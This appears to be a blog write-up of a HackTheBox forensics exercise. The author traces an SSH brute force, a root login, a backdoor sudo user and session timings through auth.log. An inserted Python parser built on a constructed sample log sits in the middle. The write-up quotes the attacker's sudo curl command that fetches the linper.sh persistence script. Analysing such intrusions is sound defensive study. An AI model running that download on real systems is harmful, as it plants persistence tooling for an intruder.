neiwad_
[HTB] Sherlock - Brutus

Hello, this is my writeup for the Brutus Sherlock on HackTheBox.

Step 1: preparation

As a first step, I download the zip file and use the given password to extract the archive.


There are two files inside:

  • auth.log (Linux log file that keeps track of authentication attempts, whether they succeed or fail)
  • wtmp (binary file that keeps track of terminal/session creation and assignment for users)

I first wanted to do this Sherlock on my MacBook, but the wtmp file is hard to open on a Mac, so I sent these files to my Kali VM.

scp -r Brutus/ KALI_USER@VM_IP:~/Desktop

Step 2: analysis

Question 1: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

After a quick look at the auth.log, I can see that starting at 06:31:31 there are many invalid user and failed password attempts coming from IP 65.2.161.68.

Question 2: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

I continue digging into the auth.log and I can see that at 06:31:40 there is an accepted password for root from the brute force IP above (65.2.161.68).

Question 3: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

As we can see, after the brute force attack successfully found the root password, some further authentication attempts from the same IP still failed, so the brute force attack was still in progress.

Later in the file, at 06:32:44, I can see that the root user has opened a new session from the attacker's IP.

The timestamp 06:32:44 is not accepted as the answer, so I need to look inside the wtmp file to check the real timestamp of the root terminal, but the file seems to be corrupted on my side and is almost empty.
I chose to consult the official write-up, which gives the timestamp 06:32:45.

Question 4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

Quite simple: right under the successful login for root from the attacker's IP, we can see a new session 37 for user root.

Question 5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

Still in the auth.log, I can see at 06:34:18 that a group and a user named cyberjunkie were created.

Later, at 06:35:15, the cyberjunkie user is added to the sudo group.

Question 6: What is the MITRE ATT&CK sub-technique ID used for persistence?

After a little research, I identified the matching persistence sub-technique in the MITRE ATT&CK matrix.

Question 7: How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)

So the session started at 06:32:45 (question 3), and in the auth.log I can see that session 37 was closed at 06:37:24; after some crazy maths: 279 seconds.

Question 8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

At 06:37:34 a new session was created for the user cyberjunkie.

At 06:39:38 they launched the following command with sudo:

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
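To make the same triage repeatable, here is an added Python example (my own, not part of the original writeup or the HTB material) that parses syslog-style auth.log lines and pulls out each artefact used above: the noisiest source IP of failed logins, the accepted logins, the systemd-logind session duration, sudo-group additions and sudo commands. The log lines it runs on are constructed from the events described in this post; the hostname, PIDs, ports and the year are assumptions.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample modelled on the events the writeup describes (not the real
# Brutus log); the hostname "host", the PIDs and the ports are placeholders.
SAMPLE_LOG = """\
Mar  6 06:31:31 host sshd[1101]: Invalid user admin from 65.2.161.68 port 46000
Mar  6 06:31:40 host sshd[1105]: Accepted password for root from 65.2.161.68 port 46010 ssh2
Mar  6 06:31:42 host sshd[1107]: Failed password for invalid user backup from 65.2.161.68 port 46012 ssh2
Mar  6 06:32:44 host sshd[1200]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 host systemd-logind[411]: New session 37 of user root.
Mar  6 06:34:18 host useradd[1303]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash
Mar  6 06:35:15 host usermod[1310]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:37:24 host systemd-logind[411]: Removed session 37.
Mar  6 06:39:38 host sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
"""
LINE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (.*)$")

def parse(log):
    """[(datetime, message)] per line; syslog omits the year, so 2024 is assumed."""
    return [(datetime.strptime("2024 " + m.group(1), "%Y %b %d %H:%M:%S"), m.group(2))
            for m in map(LINE.match, log.splitlines()) if m]

def brute_force_source(events):
    """Source IP with the most failed or invalid-user SSH attempts (Q1)."""
    ips = Counter(re.search(r" from (\S+) port", msg).group(1) for _, msg in events
                  if "Failed password" in msg or "Invalid user" in msg)
    return ips.most_common(1)[0][0]

def accepted_logins(events):
    """[(HH:MM:SS, user, ip)] for every 'Accepted password' line (Q2, Q3)."""
    return [(ts.strftime("%H:%M:%S"), m.group(1), m.group(2)) for ts, msg in events
            for m in [re.search(r"Accepted password for (\S+) from (\S+)", msg)] if m]

def session_seconds(events, number):
    """Seconds between 'New session N' and 'Removed session N' from systemd-logind (Q4, Q7)."""
    start = next(ts for ts, msg in events if f"New session {number} of user" in msg)
    end = next(ts for ts, msg in events if f"Removed session {number}." in msg)
    return int((end - start).total_seconds())

def sudo_group_additions(events):
    """Users added to the sudo group via usermod (Q5 persistence)."""
    return [m.group(1) for _, msg in events
            for m in [re.search(r"^usermod\[\d+\]: add '(\S+)' to group 'sudo'", msg)] if m]

def sudo_commands(events):
    """[(user, command)] from sudo's own log lines (Q8)."""
    return [(m.group(1), m.group(2)) for _, msg in events
            for m in [re.search(r"^sudo:\s+(\S+) : .*COMMAND=(.*)$", msg)] if m]
```

On this constructed sample the session length comes out as 280 s because auth.log logs the session at 06:32:44; taking the wtmp login time of 06:32:45 as the start, as the writeup does, gives 279 s. wtmp itself is binary, so on Linux it is read with `last -f wtmp` or `utmpdump wtmp` rather than a text parser like this one.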

Step 3: that's it

It was my first Sherlock on HTB and it was really fun!

If you want to subscribe to the HackTheBox Academy, you can use my referral link!
